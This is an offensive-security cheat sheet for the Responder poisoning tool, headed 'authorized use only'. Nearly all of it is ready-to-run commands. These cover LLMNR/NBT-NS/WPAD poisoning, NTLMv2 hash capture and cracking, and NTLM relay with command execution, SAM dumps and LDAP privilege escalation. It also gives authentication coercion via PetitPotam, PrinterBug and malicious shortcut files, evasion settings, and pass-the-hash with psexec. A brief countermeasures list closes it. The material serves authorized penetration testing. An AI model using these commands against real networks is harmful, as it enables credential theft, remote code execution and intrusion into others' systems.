RESPONDER
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Responder is a LLMNR, NBT-NS, and MDNS poisoner. Captures credentials by responding to broadcast name resolution requests.
BASIC USAGE#
# Start Responder sudo responder -I eth0 # With all options enabled sudo responder -I eth0 -rdwv # Analyze mode (passive, no poisoning) sudo responder -I eth0 -A
COMMON OPTIONS#
-I INTERFACE Network interface -i IP Local IP to use -e IP External IP for WPAD -r Enable LLMNR responses (default) -d Enable NBT-NS responses -w Start WPAD rogue proxy -F Force WPAD auth (HTML) -P Force proxy auth (Basic) -v Verbose mode -A Analyze mode (passive) -f Fingerprint hosts
PROTOCOL OPTIONS#
# Responder.conf controls which services to enable/disable # /etc/responder/Responder.conf or /usr/share/responder/Responder.conf # Services: SQL = On/Off SMB = On/Off RDP = On/Off Kerberos = On/Off FTP = On/Off POP = On/Off SMTP = On/Off IMAP = On/Off HTTP = On/Off HTTPS = On/Off DNS = On/Off LDAP = On/Off DCERPC = On/Off WINRM = On/Off
BASIC ATTACKS#
LLMNR/NBT-NS POISONING#
# Default poisoning sudo responder -I eth0 # When victim tries to access \\server\share that doesn't exist: # 1. DNS fails # 2. LLMNR/NBT-NS broadcast query # 3. Responder responds with attacker IP # 4. Victim connects to attacker # 5. Responder captures NTLMv2 hash
WPAD ATTACK#
# Enable WPAD proxy sudo responder -I eth0 -wFv # Captures hashes from: # - Browsers configured for auto proxy detection # - Windows services checking WPAD # - Edge/IE with auto-detect enabled
SMB RELAY (Disabled by Default)#
# Disable SMB in Responder.conf for relay # SMB = Off # HTTP = Off # Then use with ntlmrelayx sudo responder -I eth0 # In another terminal: ntlmrelayx.py -tf targets.txt -smb2support
DHCP POISONING#
# DHCP exhaustion + poisoning sudo responder -I eth0 --dhcp
ANALYZE MODE#
# Passive fingerprinting (no poisoning) sudo responder -I eth0 -A # Identify: # - Hosts making LLMNR/NBT-NS queries # - Protocols in use # - Potential targets
CAPTURED HASHES#
HASH LOCATION#
# Hashes saved to: /usr/share/responder/logs/ # or ~/.responder/logs/ # Files: # - SMB-NTLMv2-SSP-IP.txt # - HTTP-NTLMv2-IP.txt # - Responder-Session.log
HASH FORMAT#
# NTLMv2 format: username::domain:ServerChallenge:NTProofStr:NTLMv2Response # Example: admin::DOMAIN:1122334455667788:aabbccdd...:0101000000000000...
CRACKING HASHES#
# Hashcat hashcat -m 5600 hashes.txt wordlist.txt # John the Ripper john --format=netntlmv2 hashes.txt
NTLM RELAY ATTACKS#
SETUP FOR RELAY#
# 1. Disable SMB and HTTP in Responder.conf [Responder Core] SMB = Off HTTP = Off # 2. Start Responder sudo responder -I eth0 -rv # 3. Start ntlmrelayx ntlmrelayx.py -tf targets.txt -smb2support # 4. Wait for connections
RELAY TARGETS#
# targets.txt format: 192.168.1.10 192.168.1.20 smb://192.168.1.30 ldap://192.168.1.1
RELAY OPTIONS#
# Execute command ntlmrelayx.py -tf targets.txt -c "whoami" # Execute payload ntlmrelayx.py -tf targets.txt -e payload.exe # SAM dump ntlmrelayx.py -tf targets.txt --dump-sam # LDAP relay ntlmrelayx.py -t ldap://DC -smb2support # LDAP relay with escalation ntlmrelayx.py -t ldap://DC --escalate-user attacker -smb2support # SOCKS proxy ntlmrelayx.py -tf targets.txt -socks -smb2support
ADVANCED ATTACKS#
MULTICAST DNS (MDNS)#
sudo responder -I eth0 -r
IPv6 ATTACKS#
# Use with mitm6 sudo mitm6 -d domain.local # In another terminal: ntlmrelayx.py -6 -t ldap://DC -wh wpad.domain.local
DHCP POISONING#
# Respond to DHCP requests with malicious settings sudo responder -I eth0 --dhcp
MACHINE ACCOUNT ABUSE#
# Force authentication via various methods: # - PetitPotam # - PrinterBug # - DFSCoerce # Then relay to LDAP for RBCD attack
FORCING AUTHENTICATION#
Methods to coerce authentication: # 1. Share access # Create malicious file: # shortcut.lnk -> \\attacker\share # desktop.ini with IconFile=\\attacker\share # 2. Office documents # Include: \\attacker\share\image.png # 3. PDF files # Use pdf-parser to inject UNC paths # 4. PetitPotam (MS-EFSRPC) python3 PetitPotam.py -u user -p pass attacker_ip target_ip # 5. PrinterBug (MS-RPRN) python3 printerbug.py domain/user:password@target attacker_ip # 6. DFSCoerce (MS-DFSNM) python3 dfscoerce.py -u user -p pass -d domain.local attacker_ip target_ip # 7. WebDAV # Create malicious .searchConnector-ms or .library-ms files
EVASION#
# Limit responses # Edit Responder.conf: [Responder Core] RespondTo = 192.168.1.0/24 DontRespondTo = 192.168.1.1 # Specific names only RespondToName = WPAD,ISATAP # Don't respond to certain hosts DontRespondTo = 192.168.1.1,192.168.1.2
LOG ANALYSIS#
# View captured hashes cat /usr/share/responder/logs/*NTLM*.txt # View session log cat /usr/share/responder/logs/Responder-Session.log # Parse logs grep -h "NTLMv2" /usr/share/responder/logs/*.txt | sort -u # Extract usernames cat /usr/share/responder/logs/*NTLM*.txt | cut -d: -f1 | sort -u
INTEGRATION WITH OTHER TOOLS#
WITH NTLMRELAYX#
sudo responder -I eth0 -rv ntlmrelayx.py -tf targets.txt -smb2support
WITH MITM6#
sudo mitm6 -d domain.local ntlmrelayx.py -6 -t ldap://DC -wh attacker.domain.local -l loot
WITH IMPACKET#
# Use captured hashes with Impacket tools psexec.py domain/user@target -hashes :CAPTURED_HASH
WITH CRACKMAPEXEC#
nxc smb targets.txt -u user -H CAPTURED_HASH
COUNTERMEASURES#
- Disable LLMNR (GPO) - Disable NBT-NS (NIC settings) - Enable SMB signing - Use network segmentation - Monitor for Responder traffic - Deploy honeypots
QUICK REFERENCE#
sudo responder -I eth0 # Basic poisoning sudo responder -I eth0 -wFv # With WPAD sudo responder -I eth0 -A # Analyze only sudo responder -I eth0 -rv # For relay (disable SMB in conf) ntlmrelayx.py -tf targets.txt # Relay captured auth hashcat -m 5600 hash.txt wordlist # Crack NTLMv2